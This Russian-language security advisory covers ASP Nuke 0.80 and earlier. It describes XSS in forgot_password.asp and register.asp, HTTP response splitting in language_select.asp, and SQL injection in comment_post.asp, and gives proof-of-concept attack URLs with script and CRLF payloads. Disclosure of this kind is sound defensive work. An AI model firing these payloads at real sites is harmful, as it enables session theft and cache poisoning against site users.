Программа: ASP Nuke 0.80 и более ранние версии
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, атаку HTTP Response Splitting и выполнить произвольные SQL команды в базе данных приложения.
1. Межсайтовый скриптинг возможен из-за недостаточной обработки параметра 'email' в сценарии 'forgot_password.asp' и в нескольких параметрах сценария 'register.asp'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/module/account/register/forgot_password.asp? email=%22%3E%3Cscript%3Ealert(document.cookie)
%3C/script%3E
http://[target]/module/account/register/register.asp?FirstName=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/module/account/register /register.asp?LastName
=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/module/account/register/register.asp?Username =%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/module/account/register/register.asp?Address2 =%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/module/account/register/register.asp?City=
%22%3E%3Cscript%3Ealert( document.cookie)%3C/script%3E
2. Атака HTTP Response Splitting возможна из-за недостаточной обработки параметра LangCode в сценарии 'language_select.asp'. Удаленный пользователь может с помощью специально сформированного запроса подменить содержимое страниц сайта и отравить кеш промежуточных прокси серверов.
Пример:
http://[target]/module/support/language/language_select.asp?action=go &LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue
3. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметре 'TaskID' сценария 'comment_post.asp'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.